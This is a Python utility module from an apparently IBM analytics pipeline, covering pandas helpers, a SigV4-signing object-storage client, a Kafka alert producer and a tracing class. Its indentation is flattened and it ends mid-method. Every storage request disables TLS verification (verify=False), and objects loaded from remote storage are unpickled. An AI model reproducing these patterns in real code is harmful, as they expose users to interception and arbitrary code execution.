# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
#
# *****************************************************************************
import datetime
import datetime as dt
import errno
import hashlib
import hmac
import json
import logging
import logging.config
import os
import random
import re
import string
import sys
import tempfile
import threading
import time
from base64 import b64encode
from urllib.parse import quote, urlparse
import dill as pickle
import pandas as pd
import requests
from lxml import etree
logger = logging.getLogger(__name__)
try:
from confluent_kafka import Producer
except ImportError:
logger.warning('Warning: confluent_kafka is not installed. Publish to MessageHub not supported.')
KAFKA_INSTALLED = False
else:
KAFKA_INSTALLED = True
try:
import ibm_boto3
from ibm_boto3.s3.transfer import S3Transfer
from ibm_botocore.client import Config
except BaseException:
IBMBOTO_INSTALLED = False
logger.info('ibm_boto3 is not installed. Use HMAC credentials to communicate with COS.')
else:
IBMBOTO_INSTALLED = True
FLUSH_PRODUCER_EVERY = 500
MH_USER = os.environ.get('MH_USER')
MH_PASSWORD = os.environ.get('MH_PASSWORD')
MH_BROKERS_SASL = os.environ.get('MH_BROKERS_SASL')
MH_DEFAULT_ALERT_TOPIC = os.environ.get('MH_DEFAULT_ALERT_TOPIC')
MH_CLIENT_ID = 'as-pipeline-alerts-producer'
UNIQUE_EXTENSION_LABEL = '_###IBM_Temporary###'
def setup_logging(log_level=logging.INFO, root_log_level=logging.DEBUG):
logging.config.dictConfig({'version': 1, 'disable_existing_loggers': False, 'formatters': {
'simple': {'format': '%(asctime)s [PID %(process)d] [%(levelname)-7s] %(name)s.%(funcName)s : %(message)s ',
'datefmt': '%Y-%m-%d %I:%M:%S %p'}}, 'handlers': {
'console': {'class': 'logging.StreamHandler', 'formatter': 'simple', 'stream': 'ext://sys.stdout'},
'file': {'class': 'logging.FileHandler', 'filename': 'main.log', 'mode': 'w', 'formatter': 'simple'}},
'loggers': {'analytics_service': {'level': log_level}},
'root': {'level': root_log_level, 'handlers': ['console', 'file']}})
def adjust_probabilities(p_list):
"""
    Adjust a list of probabilities to ensure that they sum to 1
"""
if p_list is None or len(p_list) == 0:
out = None
else:
total = sum(p_list)
if total == 1:
out = p_list
elif total == 0:
raise ValueError('Probabilities may not sum to zero')
else:
out = [x / total for x in p_list]
return out
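# Example (illustrative): adjust_probabilities([0.2, 0.2, 0.2]) -> [1/3, 1/3, 1/3],
# while adjust_probabilities([0.25, 0.25, 0.5]) is returned unchanged.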
def build_grouper(freq, timestamp, entity_id=None, dimensions=None, custom_calendar_keys=None, ):
"""
    Build a pandas grouper from columns and frequency metadata.
Parameters
-----------
freq : str
pandas frequency string
timestamp: str
name of timestamp column to group by
entity_id: str
column name for the entity_id if entity id is included in group by
e.g. device_id
dimensions: list of strs
column names for the dimensions to be included in group by
e.g. ['company','city']
custom_calendar_keys: list of strs
column names for the custom calendar keys to be included in group by
e.g. ['shift']
"""
grouper = []
if dimensions is None:
dimensions = []
if entity_id is not None:
grouper.append(pd.Grouper(key=entity_id))
grouper.append(pd.Grouper(key=timestamp, freq=freq))
for d in dimensions:
grouper.append(pd.Grouper(key=d))
return grouper
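# Usage sketch (illustrative; the column names are hypothetical):
#   grouper = build_grouper(freq='5min', timestamp='evt_timestamp',
#                           entity_id='deviceid', dimensions=['company'])
#   df.groupby(grouper).mean()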
def categorize_args(categories, catch_all, *args):
"""
    Separate objects passed as arguments into a dictionary of categories.
    Members of a category are identified either by a bool property or by
    being instances of a class.
example:
categories = [('constant','is_ui_control',None),
('granularity','is_granularity',None),
('function','is_function',None),
('column',None,Column)]
"""
meta = {}
if catch_all is not None:
meta[catch_all] = set()
logger.debug('categorizing arguments')
uncat = set(args)
for (group, attr, cls) in categories:
meta[group] = set()
for a in args:
if attr is not None:
try:
is_group = getattr(a, attr)
except AttributeError:
is_group = False
else:
is_group = False
if is_group:
meta[group].add(a)
uncat.remove(a)
elif cls is not None and isinstance(a, cls):
meta[group].add(a)
uncat.remove(a)
for a in uncat:
meta[catch_all].add(a)
return meta
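# Usage sketch (illustrative), following the `categories` example in the docstring:
#   meta = categorize_args(categories, 'unknown', *args)
#   meta['function']  # -> set of args whose is_function property is True
#   meta['unknown']   # -> anything that matched no category (the catch_all group)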
def compare_dataframes(dfl, dfr, cols=None):
"""
Explain the differences between 2 dataframes
"""
if cols is None:
cols = list(dfl.columns)
differences = 0
trace = ''
if len(dfl.index) != len(dfr.index):
        msg = 'Row count: %s vs %s' % (len(dfl.index), len(dfr.index))
trace = trace + msg
differences += abs(len(dfl.index) - len(dfr.index))
missing_l = set(cols) - set(dfl.columns)
if len(missing_l) != 0:
        msg = 'dfl is missing columns: %s' % (missing_l)
trace = trace + msg
cols = [x for x in cols if x not in missing_l]
differences += len(missing_l) * len(dfl.index)
missing_r = set(cols) - set(dfr.columns)
if len(missing_r) != 0:
msg = 'dfr is missing columns: %s' % (missing_r)
trace = trace + msg
cols = [x for x in cols if x not in missing_r]
differences += len(missing_r) * len(dfr.index)
dfl = dfl[cols].reindex()
dfr = dfr[cols].reindex()
dfs = {'dfl': dfl, 'dfr': dfr}
df = pd.concat(dfs)
total_rows = len(df.index)
df = df.drop_duplicates(keep=False)
if total_rows - len(df.index) > 0:
msg = 'Rows with different contents:%s' % (total_rows - len(df.index))
trace = trace + msg
differences = differences + total_rows - len(df.index)
return (differences, trace, df)
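# Usage sketch (illustrative):
#   differences, trace, df_diff = compare_dataframes(df_expected, df_actual)
#   if differences > 0:
#       logger.debug(trace)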
def reset_df_index(df, auto_index_name='_auto_index_'):
"""
    Reset the dataframe index. Ignore duplicate columns.
"""
# if the dataframe has an auto index, do not place it in the dataframe
if len([x for x in df.index.names if x is not None]) > 0:
drop = False
elif df.index.name is None or df.index.name == auto_index_name:
drop = True
else:
drop = False
# drop any duplicate columns that exist in index and df
try:
        df = df.reset_index(inplace=False, drop=drop)  # do not propagate
except ValueError:
index_names = get_index_names(df)
dup_names = set(index_names).intersection(set(df.columns))
for i in dup_names:
df = df.drop(columns=[i])
logger.debug('Dropped duplicate column name %s while resetting index', i)
try:
            df = df.reset_index(inplace=False, drop=drop)  # do not propagate
except ValueError:
msg = ('There is a problem with the dataframe index. '
' Cant reset as reset caused overlap in col names'
' index: %s, cols: %s' % (df.index.names, df.columns))
raise RuntimeError(msg)
return df
def resample(df, time_frequency, timestamp, dimensions=None, agg=None, default_aggregate='last'):
"""
Resample a dataframe to a new time grain / dimensional grain
Parameters:
-----------
df: Pandas dataframe
Dataframe to resample
time_frequency: str
Pandas frequency string
dimensions: list of strs
List of columns to group by
agg : dict
Pandas aggregate dictionary
default_aggregate: str
Default aggregation function to apply for anything not specified in agg
Returns
-------
Pandas dataframe
"""
if dimensions is None:
dimensions = []
if agg is None:
agg = {}
df = df.reset_index()
index_cols = [timestamp]
index_cols.extend(dimensions)
for r in [x for x in df.columns if x not in index_cols]:
try:
agg[r]
except KeyError:
agg[r] = default_aggregate
group_base = [pd.Grouper(key=timestamp, freq=time_frequency)]
for d in dimensions:
group_base.append(pd.Grouper(key=d))
df = df.groupby(group_base).agg(agg)
df.reset_index(inplace=True)
return df
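# Usage sketch (illustrative; column names are hypothetical):
#   df_hourly = resample(df, time_frequency='1H', timestamp='evt_timestamp',
#                        dimensions=['company'], agg={'temp': 'mean'},
#                        default_aggregate='last')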
def freq_to_timedelta(freq):
"""
    The pandas to_timedelta function does not handle the full set
    of pandas frequency abbreviations. Convert to a supported
    abbreviation and then use to_timedelta.
"""
try:
freq = freq.replace('T', 'min')
except AttributeError:
pass
return (pd.to_timedelta(freq))
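# Example (illustrative): freq_to_timedelta('5T') and freq_to_timedelta('5min')
# both return Timedelta('0 days 00:05:00').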
def randomword(length):
letters = string.ascii_lowercase + string.digits
return ''.join(random.choice(letters) for i in range(length))
def cosSave(obj, bucket, filename, credentials):
"""
Use IAM credentials to write an object to Cloud Object Storage
"""
try:
fhandle, fname = tempfile.mkstemp("cosfile")
os.close(fhandle)
with open(fname, 'wb') as file_obj:
pickle.dump(obj, file_obj)
transfer = getCosTransferAgent(credentials)
transfer.upload_file(fname, bucket, filename)
os.unlink(fname)
except Exception as ex:
logging.exception(ex)
return filename
def cosLoad(bucket, filename, credentials):
"""
Use IAM credentials to read an object from Cloud Object Storage
"""
try:
fhandle, fname = tempfile.mkstemp("cosfile")
os.close(fhandle)
transfer = getCosTransferAgent(credentials)
transfer.download_file(bucket, filename, fname)
answer = None
with open(fname, 'rb') as file_obj:
answer = pickle.load(file_obj)
os.unlink(fname)
return answer
except Exception as ex:
logging.exception(ex)
def getCosTransferAgent(credentials):
"""
Use IAM credentials to obtain a Cloud Object Storage transfer agent object
"""
if IBMBOTO_INSTALLED:
endpoints = requests.get(credentials.get('endpoints')).json()
iam_host = (endpoints['identity-endpoints']['iam-token'])
cos_host = (endpoints['service-endpoints']['cross-region']['us']['public']['us-geo'])
api_key = credentials.get('apikey')
service_instance_id = credentials.get('resource_instance_id')
auth_endpoint = "https://" + iam_host + "/oidc/token"
service_endpoint = "https://" + cos_host
cos = ibm_boto3.client('s3', ibm_api_key_id=api_key, ibm_service_instance_id=service_instance_id,
ibm_auth_endpoint=auth_endpoint, config=Config(signature_version='oauth'),
endpoint_url=service_endpoint)
return S3Transfer(cos)
else:
raise ValueError('Attempting to use IAM credentials to communicate with COS. IBMBOTO is not installed.\
            You may use HMAC credentials and the CosClient instead.')
def get_index_names(df):
"""
Get names from either single or multi-part index
"""
if df.index.name is not None:
df_index_names = [df.index.name]
else:
df_index_names = list(df.index.names)
df_index_names = [x for x in df_index_names if x is not None]
return df_index_names
def infer_data_items(expressions):
"""
Examine a pandas expression or list of expressions. Identify data items
in the expressions by looking for df['<data_item>'].
    Returns a set of strings.
"""
if not isinstance(expressions, list):
expressions = [expressions]
regex1 = "df\[\'(.+?)\'\]"
regex2 = 'df\[\"(.+?)\"\]'
data_items = set()
for e in expressions:
data_items |= set(re.findall(regex1, e))
data_items |= set(re.findall(regex2, e))
return (data_items)
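# Example (illustrative): infer_data_items("df['temp'] * df[\"speed\"]")
# returns {'temp', 'speed'}.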
def get_fn_expression_args(function_metadata, kpi_metadata):
"""
    Examine a function's metadata dictionary. Identify data items used
in any expressions that the function has.
"""
expressions = []
args = kpi_metadata.get('input', {})
for (arg, value) in list(args.items()):
if arg == 'expression' and value is not None:
expressions.append(value)
logger.debug('Found expression %s', value)
return infer_data_items(expressions)
def get_fn_scope_sources(scope_key, kpi):
scope_sources = set()
if kpi.get(scope_key):
scope = kpi.get(scope_key)
if scope.get('type') == 'DIMENSIONS':
for dimension_filter in scope.get('dimensions'):
dimension_name = dimension_filter['name']
scope_sources.add(dimension_name)
else:
expression = scope.get('expression')
if expression is not None and '${' in expression:
expression = re.sub(r"\$\{(\w+)\}", r"df['\1']", expression)
scope_sources.update(infer_data_items(expression))
logger.info('scope sources {} for kpi {}'.format(scope_sources, kpi))
return scope_sources
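# Example (illustrative): a scope expression of "${status} == 'active'" is rewritten
# to "df['status'] == 'active'" and therefore contributes {'status'} to scope_sources.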
def is_df_mergeable(transformed_df, original_df):
"""
Only merge if the two dataframes have same number of rows and
transformed dataframe has all the columns from the original dataframe
"""
is_mergeable = False
if original_df.shape[0] == transformed_df.shape[0] and set(original_df.index).issubset(transformed_df.index):
is_mergeable = True
return is_mergeable
def log_df_info(df, msg, include_data=False):
"""
Log a debugging entry showing first row and index structure
"""
try:
msg = msg + ' ; df row count: %s ' % (len(df.index))
if df.index.names != [None]:
msg = msg + ' ; index: { %s } ' % (' , '.join(df.index.names))
else:
msg = msg + ' ; index is unnamed'
if include_data:
msg = msg + ' ; 1st row: '
try:
cols = df.head(1).squeeze().to_dict()
for key, value in list(cols.items()):
msg = msg + '%s : %s, ' % (key, value)
except AttributeError:
msg = msg + str(df.head(1))
else:
msg = msg + ' ; columns: { %s }' % (' , '.join(list(df.columns)))
logger.debug(msg)
return msg
except Exception:
logger.warning('dataframe contents not logged due to an unknown logging error')
return ''
def asList(x):
if not isinstance(x, list):
x = [x]
return x
class CosClient:
"""
Cloud Object Storage client
"""
def __init__(self, credentials):
self._cod_hmac_access_key_id = credentials['objectStorage']['username']
self._cod_hmac_secret_access_key = credentials['objectStorage']['password']
self._cos_region = credentials['objectStorage']['region']
self._cos_endpoint = credentials['config']['objectStorageEndpoint']
if self._cos_region is None or len(self._cos_region.strip()) == 0:
self._cos_region = 'any-region'
# hashing and signing methods
def _hash(self, key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
# region is a wildcard value that takes the place of the AWS region value
    # as COS doesn't use the same conventions for regions, this parameter can accept any string
def _create_signature_key(self, key, datestamp, region, service):
keyDate = self._hash(('AWS4' + key).encode('utf-8'), datestamp)
keyString = self._hash(keyDate, region)
keyService = self._hash(keyString, service)
keySigning = self._hash(keyService, 'aws4_request')
return keySigning
def _cos_api_request(self, http_method, bucket, key, request_parameters=None, payload='', extra_headers=None,
binary=False):
if extra_headers is None:
extra_headers = {}
# it seems region is not used by IBM COS and can be any string (but cannot be None below still)
if any([(var is None or len(var.strip()) == 0) for var in
[self._cod_hmac_access_key_id, self._cod_hmac_secret_access_key, self._cos_endpoint, bucket]]):
logger.warning('write COS is disabled because not all COS config environment variables are set')
return None
# assemble the standardized request
time = datetime.datetime.utcnow()
timestamp = time.strftime('%Y%m%dT%H%M%SZ')
datestamp = time.strftime('%Y%m%d')
url = urlparse(self._cos_endpoint)
host = url.netloc
payload_hash = hashlib.sha256(str.encode(payload) if isinstance(payload, str) else payload).hexdigest()
standardized_resource = '/'
if bucket is not None:
standardized_resource += bucket
if key is not None:
standardized_resource += '/' + key
if request_parameters is None:
standardized_querystring = ''
else:
standardized_querystring = '&'.join(
['%s=%s' % (quote(k, safe=''), quote(v, safe='')) for k, v in request_parameters.items()])
all_headers = {'host': host, 'x-amz-content-sha256': payload_hash, 'x-amz-date': timestamp}
all_headers.update({k.lower(): v for k, v in extra_headers.items()})
standardized_headers = ''
for header in sorted(all_headers.keys()):
standardized_headers += '%s:%s\n' % (header, all_headers[header])
signed_headers = ';'.join(sorted(all_headers.keys()))
# standardized_headers = 'host:' + host + '\n' + 'x-amz-content-sha256:' + payload_hash + '\n' + 'x-amz-date:' + timestamp + '\n'
# signed_headers = 'host;x-amz-content-sha256;x-amz-date'
standardized_request = (
http_method + '\n' + standardized_resource + '\n' + standardized_querystring + '\n' + standardized_headers + '\n' + signed_headers + '\n' + payload_hash)
# logging.debug('standardized_request=\n%s' % standardized_request)
# assemble string-to-sign
hashing_algorithm = 'AWS4-HMAC-SHA256'
credential_scope = datestamp + '/' + self._cos_region + '/' + 's3' + '/' + 'aws4_request'
sts = (hashing_algorithm + '\n' + timestamp + '\n' + credential_scope + '\n' + hashlib.sha256(
str.encode(standardized_request)).hexdigest())
# logging.debug('string-to-sign=\n%s' % sts)
# generate the signature
signature_key = self._create_signature_key(self._cod_hmac_secret_access_key, datestamp, self._cos_region, 's3')
signature = hmac.new(signature_key, (sts).encode('utf-8'), hashlib.sha256).hexdigest()
# logging.debug('signature=\n%s' % signature)
# assemble all elements into the 'authorization' header
v4auth_header = (
hashing_algorithm + ' ' + 'Credential=' + self._cod_hmac_access_key_id + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature)
# logging.debug('v4auth_header=\n%s' % v4auth_header)
        # the 'requests' package automatically adds the required 'host' header
headers = all_headers.copy()
headers.pop('host')
headers['Authorization'] = v4auth_header
# headers = {'x-amz-content-sha256': payload_hash, 'x-amz-date': timestamp, 'Authorization': v4auth_header}
if standardized_querystring == '':
request_url = self._cos_endpoint + standardized_resource
else:
request_url = self._cos_endpoint + standardized_resource + '?' + standardized_querystring
# logging.debug('request_url=%s' % request_url)
if http_method == 'GET':
resp = requests.get(request_url, headers=headers, timeout=30, verify=False)
elif http_method == 'DELETE':
resp = requests.delete(request_url, headers=headers, timeout=30, verify=False)
elif http_method == 'POST':
resp = requests.post(request_url, headers=headers, data=payload, timeout=30, verify=False)
elif http_method == 'PUT':
resp = requests.put(request_url, headers=headers, data=payload, timeout=30, verify=False)
else:
raise RuntimeError('unsupported_http_method=%s' % http_method)
if resp.status_code != requests.codes.ok and not (
resp.status_code == requests.codes.no_content and http_method == 'DELETE'):
logger.warning('error cos_api_request: request_url=%s, http_method=%s, status_code=%s, response_text=%s' % (
request_url, http_method, str(resp.status_code), str(resp.text)))
return None
return resp.content if binary else resp.text
def cos_get(self, key, bucket, request_parameters=None, binary=False):
response = self._cos_api_request('GET', bucket=bucket, key=key, request_parameters=request_parameters,
binary=binary)
if response is not None:
response = pickle.loads(response)
return response
def cos_find(self, prefix, bucket):
result = self.cos_get(key=None, bucket=bucket, request_parameters={'list-type': '2', 'prefix': prefix})
if result is None:
return []
root = etree.fromstring(str.encode(result))
return [elem.text for elem in root.findall('Contents/Key', root.nsmap)]
def cos_put(self, key, payload, bucket, binary=False, serialize=True):
if payload is not None:
if serialize:
payload = pickle.dumps(payload)
else:
payload = ''
return self._cos_api_request('PUT', bucket=bucket, key=key, payload=payload, binary=binary)
def cos_delete(self, key, bucket):
return self._cos_api_request('DELETE', bucket=bucket, key=key)
def cos_delete_multiple(self, keys, bucket):
if keys is None or len(keys) == 0:
return ''
payload = '<?xml version="1.0" encoding="UTF-8"?><Delete>'
for key in keys:
payload += '<Object><Key>%s</Key></Object>' % key
payload += '</Delete>'
md5 = hashlib.md5(str.encode(payload)).digest()
base64 = b64encode(md5).decode()
logger.debug('content-md5: %s' % base64)
extra_headers = {'Content-Type': 'text/plain; charset=utf-8', 'Content-MD5': base64}
request_parameters = {'delete': ''}
return self._cos_api_request('POST', bucket=bucket, key=None, payload=payload,
request_parameters=request_parameters, extra_headers=extra_headers)
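    # Usage sketch (illustrative; the credential dictionary must provide the keys
    # read in __init__, i.e. credentials['objectStorage'][...] and
    # credentials['config']['objectStorageEndpoint']):
    #
    #   cos = CosClient(credentials)
    #   cos.cos_put('model/my_key', {'a': 1}, bucket='my-bucket')
    #   obj = cos.cos_get('model/my_key', bucket='my-bucket')
    #   keys = cos.cos_find('model/', bucket='my-bucket')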
class MemoryOptimizer:
"""
Util class used to optimize the pipeline memory consumption using native Pandas downcasting
"""
def printCurrentMemoryConsumption(self, df):
logger.info('Memory consumed by the data frame: \n %s' % df.memory_usage(deep=True))
def printUsagePerType(self, df):
for dtype in ['float', 'int', 'object']:
selected_dtype = df.select_dtypes(include=[dtype])
mean_usage_b = selected_dtype.memory_usage(deep=True).mean()
mean_usage_mb = mean_usage_b / 1024 ** 2
logger.info("Average memory usage for {} columns: {:03.2f} MB".format(dtype, mean_usage_mb))
def downcastInteger(self, df):
df_new = df.copy()
logger.info('Applying downcast to Integer columns.')
try:
df_int = df_new.select_dtypes(include=['int'])
if not df_int.empty:
df_converted = df_int.apply(pd.to_numeric, downcast='unsigned')
for col in df_converted.columns:
df_new[col] = df_converted[col]
except Exception:
logger.warning('Not able to downcast Integer')
return df_new
return df_new
    def downcastFloat(self, df, precision='float'):
df_new = df.copy()
logger.info('Applying downcast to Float columns.')
try:
df_float = df_new.select_dtypes(include=['float'])
if not df_float.empty:
                df_converted = df_float.apply(pd.to_numeric, downcast=precision)
for col in df_converted.columns:
df_new[col] = df_converted[col]
except Exception:
logger.warning('Not able to downcast Float types')
return df_new
return df_new
def getColumnsForCategorization(self, df, threshold=0.5):
"""
It generates a list of columns that are elegible to be categorized.
The column name is printed if the number of unique values is proportionally greater than 50% of the total number of rows.
Threshold is customized.
"""
df_new = df.select_dtypes(include=['object']).copy()
lst_columns = []
for col in df_new.columns:
num_unique_values = len(df_new[col].unique())
num_total_values = len(df_new[col])
if num_unique_values / num_total_values < threshold:
                logger.info('Column eligible for categorization: %s' % col)
lst_columns.append(col)
return lst_columns
def downcastString(self, df, lst_columns):
"""
It converts a data frame column type object into a categorical type
"""
logger.info('Applying downcast to String columns. %s' % str(lst_columns))
df_new = df.select_dtypes(include=['object']).copy()
try:
for col in lst_columns:
df_new.loc[:, col] = df_new[col].astype('category')
except Exception:
logger.warning('Not able to downcast String to category')
return df
return df_new
def downcastNumeric(self, df):
logger.info('Optimizing memory. Before applying downcast.')
self.printUsagePerType(df)
self.printCurrentMemoryConsumption(df)
df_new = self.downcastInteger(df)
df_new = self.downcastFloat(df_new)
logger.info('Optimizing memory. After applying downcast.')
self.printUsagePerType(df_new)
self.printCurrentMemoryConsumption(df_new)
return df_new
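# Hedged usage sketch (illustrative only): downcastNumeric() logs memory usage before and
# after downcasting integers and floats, getColumnsForCategorization() then lists object
# columns whose unique-value ratio is under the threshold, and downcastString() returns
# only those object columns converted to the category dtype. The dataframe is made up.
def _example_memory_optimization():
    sample = pd.DataFrame({'sensor': ['a', 'b', 'a', 'b'],
                           'reading': [1.0, 2.0, 3.0, 4.0],
                           'count': [1, 2, 3, 4]})
    optimizer = MemoryOptimizer()
    slim = optimizer.downcastNumeric(sample)
    categorical_cols = optimizer.getColumnsForCategorization(slim, threshold=0.75)
    # note: downcastString returns just the object columns, now typed as category
    return optimizer.downcastString(slim, categorical_cols)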
class MessageHub:
MH_CA_CERT_PATH = '/etc/ssl/certs/eventstreams.pem'
MH_CA_CERT = os.environ.get('MH_CA_CERT')
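    # Note: _delivery_report is deliberately defined without `self`; it is used below as a
    # plain-function default for the confluent-kafka delivery callback, not as a bound method.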
def _delivery_report(err, msg):
""" Called once for each message produced to indicate delivery result.
Triggered by poll() or flush(). """
if err is not None:
logger.warning('Message delivery failed: {}'.format(err))
# else:
# logger.info('Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))
def produce_batch_alert_to_default_topic(self, key_and_msg):
self.produce_batch(topic=MH_DEFAULT_ALERT_TOPIC, key_and_msg=key_and_msg)
def produce_batch(self, topic, key_and_msg):
start_time = dt.datetime.now()
if topic is None or len(topic) == 0 or key_and_msg is None:
            logger.warning('Topic name or messages not provided. Skipping alert generation to the queues.')
return
counter = 0
producer = None
for key, msg in key_and_msg:
producer = self.produce(topic, msg=msg, key=key, producer=producer)
counter += 1
if counter % FLUSH_PRODUCER_EVERY == 0:
# Wait for any outstanding messages to be delivered and delivery report
# callbacks to be triggered.
producer.flush()
                logger.info('Number of alerts produced so far : %d (%s)' % (counter, topic))
if producer is not None:
producer.flush()
end_time = dt.datetime.now()
logger.info("Total alerts produced to message hub = %d " % len(key_and_msg))
logger.info("Total time taken to produce the alert to message hub = %s seconds." % (
end_time - start_time).total_seconds())
def produce(self, topic, msg, key=None, producer=None, callback=_delivery_report):
if topic is None or len(topic) == 0 or msg is None:
return
options = {'sasl.username': MH_USER, 'sasl.password': MH_PASSWORD, 'bootstrap.servers': MH_BROKERS_SASL,
'security.protocol': 'SASL_SSL', # 'ssl.ca.location': '/etc/ssl/certs/', # ubuntu
'ssl.ca.location': self.MH_CA_CERT_PATH, 'sasl.mechanisms': 'PLAIN', 'api.version.request': True,
'broker.version.fallback': '0.10.2.1', 'log.connection.close': False,
'client.id': MH_CLIENT_ID + '-' + randomword(4)}
if KAFKA_INSTALLED:
if producer is None:
producer = Producer(options)
# Asynchronously produce a message, the delivery report callback
# will be triggered from poll() above, or flush() below, when the message has
# been successfully delivered or failed permanently.
producer.produce(topic, value=msg, key=key, callback=callback)
# Trigger any available delivery report callbacks from previous produce() calls
producer.poll(0)
# Wait for any outstanding messages to be delivered and delivery report
# callbacks to be triggered.
# producer.flush()
else:
logger.info('Topic %s : %s' % (topic, msg))
return producer
def mkdir_p(self, path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def safe_open_w(self):
"""
Open "MH_CA_CERT_PATH" for writing, creating the parent directories as needed.
"""
self.mkdir_p(os.path.dirname(self.MH_CA_CERT_PATH))
return open(self.MH_CA_CERT_PATH, 'w')
def __init__(self):
try:
exists = os.path.isfile(self.MH_CA_CERT_PATH)
if exists:
logger.info('EventStreams certificate exists')
else:
if self.MH_CA_CERT is not None and len(self.MH_CA_CERT) > 0 and self.MH_CA_CERT.lower() != 'null':
logger.info('EventStreams create ca certificate file in pem format.')
with self.safe_open_w() as f:
f.write(self.MH_CA_CERT)
else:
logger.info('EventStreams ca certificate is empty.')
if sys.platform == "linux": # Red Hat linux
self.MH_CA_CERT_PATH = '/etc/pki/tls/cert.pem'
elif sys.platform == "darwin": # MAC OS
self.MH_CA_CERT_PATH = '/etc/ssl/cert.pem'
else: # IBM Cloud/Ubuntu
self.MH_CA_CERT_PATH = '/etc/ssl/certs'
except Exception:
logger.error('Initialization of EventStreams failed.')
raise
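# Hedged usage sketch (illustrative only): produce_batch() reuses a single confluent-kafka
# Producer across (key, message) pairs and flushes every FLUSH_PRODUCER_EVERY messages;
# when KAFKA_INSTALLED is false the messages are only logged. The topic name and payloads
# below are made up for the example.
def _example_publish_alerts():
    hub = MessageHub()
    alerts = [('device-1', '{"severity": "high"}'), ('device-2', '{"severity": "low"}')]
    hub.produce_batch(topic='example-alerts', key_and_msg=alerts)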
class Trace(object):
"""
Gather status and diagnostic information to report back in the UI
"""
save_trace_to_file = False
def __init__(self, object_name=None, parent=None, db=None):
if parent is None:
parent = self
self.parent = parent
self.db = db
self.auto_save = None
self.auto_save_thread = None
self.stop_event = None
(self.name, self.cos_path) = self.build_trace_name(object_name=object_name, execution_date=None)
self.data = []
self.df_cols = set()
self.df_index = set()
self.df_count = 0
self.usage = 0
self.prev_ts = dt.datetime.utcnow()
logger.debug('Starting trace')
logger.debug('Trace name: %s', self.name)
logger.debug('auto_save %s', self.auto_save)
self.write(created_by=self.parent, text='Trace started. ')
def as_json(self):
return json.dumps(self.data, indent=4)
def build_trace_name(self, object_name, execution_date):
try:
(trace_name, cos_path) = self.parent.build_trace_name(object_name=object_name,
execution_date=execution_date)
except AttributeError:
if object_name is None:
try:
object_name = self.parent.logical_name
except AttributeError:
object_name = self.parent.name
if execution_date is None:
execution_date = dt.datetime.utcnow()
trace_name = 'auto_trace_%s_%s' % (object_name, execution_date.strftime('%Y%m%d%H%M%S'))
cos_path = ('%s/%s/%s/%s_trace_%s' % (
self.parent.tenant_id, object_name, execution_date.strftime('%Y%m%d'), object_name,
execution_date.strftime('%H%M%S')))
return (trace_name, cos_path)
def get_stack_trace(self):
"""
Extract stack trace entries. Return string.
"""
stack_trace = ''
for t in self.data:
entry = t.get('exception', None)
if entry is not None:
stack_trace = stack_trace + entry + '\n'
entry = t.get('stack_trace', None)
if entry is not None:
stack_trace = stack_trace + entry + '\n'
return stack_trace
def reset(self, object_name=None, execution_date=None, auto_save=None):
"""
Clear trace information and rename trace
"""
self.df_cols = set()
self.df_index = set()
self.df_count = 0
self.usage = 0
self.prev_ts = dt.datetime.utcnow()
self.auto_save = auto_save
if self.auto_save_thread is not None:
            logger.debug('Resetting trace %s', self.name)
self.stop()
self.data = []
(self.name, self.cos_path) = self.build_trace_name(object_name=object_name, execution_date=execution_date)
logger.debug('Started a new trace %s ', self.name)
if self.auto_save is not None and self.auto_save > 0:
logger.debug('Initiating auto save for trace')
self.stop_event = threading.Event()
self.auto_save_thread = threading.Thread(target=self.run_auto_save, args=[self.stop_event])
self.auto_save_thread.start()
def run_auto_save(self, stop_event):
"""
Run auto save. Auto save is intended to be run in a separate thread.
"""
last_trace = None
next_autosave = dt.datetime.utcnow()
while not stop_event.is_set():
            if dt.datetime.utcnow() >= next_autosave:
if self.data != last_trace:
logger.debug('Auto save trace %s' % self.name)
self.save()
                    last_trace = list(self.data)
next_autosave = dt.datetime.utcnow() + dt.timedelta(seconds=self.auto_save)
time.sleep(0.1)
logger.debug('%s autosave thread has stopped', self.name)
def save(self):
"""
Write trace to COS
"""
try:
save_to_file = self.parent.save_trace_to_file
except AttributeError:
save_to_file = self.save_trace_to_file
trace = None
if len(self.data) == 0:
logger.debug('Trace is empty. Nothing to save.')
else:
trace = str(self.as_json())
if trace is not None:
if save_to_file:
with open('%s.json' % self.name, 'w') as fp:
fp.write(trace)
logger.debug('wrote trace to file %s.json' % self.name)
else:
if self.db is None:
logger.warning('Cannot save trace. No db object supplied')
trace = None
else:
self.db.cos_save(persisted_object=trace, filename=self.cos_path, binary=False, serialize=False)
logger.debug('Saved trace to cos %s', self.cos_path)
return trace
def stop(self):
"""
        Stop the autosave thread
"""
self.auto_save = None
if self.stop_event is not None:
self.stop_event.set()
if self.auto_save_thread is not None:
self.auto_save_thread.join()
self.auto_save_thread = None
logger.debug('Stopping autosave on trace %s', self.name)
def update_last_entry(self, msg=None, log_method=None, df=None, **kw):
"""
Update the last trace entry. Include the contents of **kw.
"""
kw['updated'] = dt.datetime.utcnow()
self.usage = self.usage + kw.get('usage', 0)
kw['cumulative_usage'] = self.usage
try:
last = self.data.pop()
except IndexError:
last = {}
logger.debug(('Tried to update the last entry of an empty trace.'
' Nothing to update. New entry will be inserted.'))
for key, value in list(kw.items()):
if isinstance(value, pd.DataFrame):
last[key] = 'Ignored dataframe object that was included in trace'
elif not isinstance(value, str):
last[key] = str(value)
if df is not None:
df_info = self._df_as_dict(df=df)
last = {**last, **df_info}
if msg is not None:
            last['text'] = last.get('text', '') + msg
self.data.append(last)
# write trace update to the log
if log_method is not None:
if msg is not None:
log_method('Trace message: %s', msg)
if len(kw) > 0:
log_method('Trace payload: %s', kw)
return last
def write(self, created_by, text, log_method=None, df=None, **kwargs):
ts = dt.datetime.utcnow()
text = str(text)
elapsed = (ts - self.prev_ts).total_seconds()
self.prev_ts = ts
kwargs['elapsed_time'] = elapsed
self.usage = self.usage + kwargs.get('usage', 0)
kwargs['cumulative_usage'] = self.usage
try:
created_by_name = created_by.name
except AttributeError:
created_by_name = str(created_by)
entry = {'timestamp': str(ts), 'created_by': created_by_name, 'text': text, 'elapsed_time': elapsed}
for key, value in list(kwargs.items()):
if not isinstance(value, str):
kwargs[key] = str(value)
entry = {**entry, **kwargs}
# The trace can track changes in a dataframe between writes
if df is not None:
df_info = self._df_as_dict(df=df)
